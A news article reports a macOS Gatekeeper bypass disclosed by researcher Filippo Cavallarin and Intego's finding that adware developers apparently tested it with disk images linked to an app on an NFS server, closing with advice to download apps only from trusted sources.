A macOS Gatekeeper vulnerability discovered by a security researcher last month has now been exploited in what appears to be a test by an adware company.

Gatekeeper is designed to ensure that Mac apps are legitimate by checking that the code has been signed by Apple. Any app failing that check shouldn’t be allowed to install without the user acknowledging the risk and granting explicit permission to proceed …

However, security researcher Filippo Cavallarin last month drew attention to a problem with this.

So one signed app can be used to authorize other unsigned ones.

Cavallarin acted responsibly in giving Apple 90 days to fix the vulnerability before disclosing it, but says that the company failed to do so and stopped responding to his emails.

The exploitation of the macOS Gatekeeper vulnerability

Security company Intego now says that it has discovered an example of this vulnerability being exploited, seemingly as a test by an adware company.

The original mechanism Cavallarin identified was via a zip file, but the sample malware found instead used a disk image.

Identifying the culprit

Intego says there is good reason to suspect the test was performed by the developers of the OSX/Surfbuyer adware.

The disk image files were either an ISO 9660 image with a .dmg file name, or an actual Apple Disk Image format .dmg file, depending on the sample. Normally, an ISO image has a .iso or .cdr file name extension, but .dmg (Apple Disk Image) files are much more commonly used to distribute Mac software. (Incidentally, several other Mac malware samples have recently been using the ISO format, possibly in a weak attempt to avoid detection by anti-malware software.)

Intego observed four samples that were uploaded to VirusTotal on June 6, seemingly within hours of the creation of each disk image, that all linked to one particular application on an Internet-accessible NFS server.

The company says the example spotted didn’t do anything other than create a temporary text file, lending weight to the idea this was just a test, and the files have since been removed from the server, but that could quickly change.

Intego has reported the Apple Developer ID to Apple so that the company can revoke the certificate.

As always, best practice is to only download apps from the Mac App Store and other sources you explicitly trust, noting that this vulnerability would allow a bad actor to supply malware alongside a legitimate app.

Photo: Shutterstock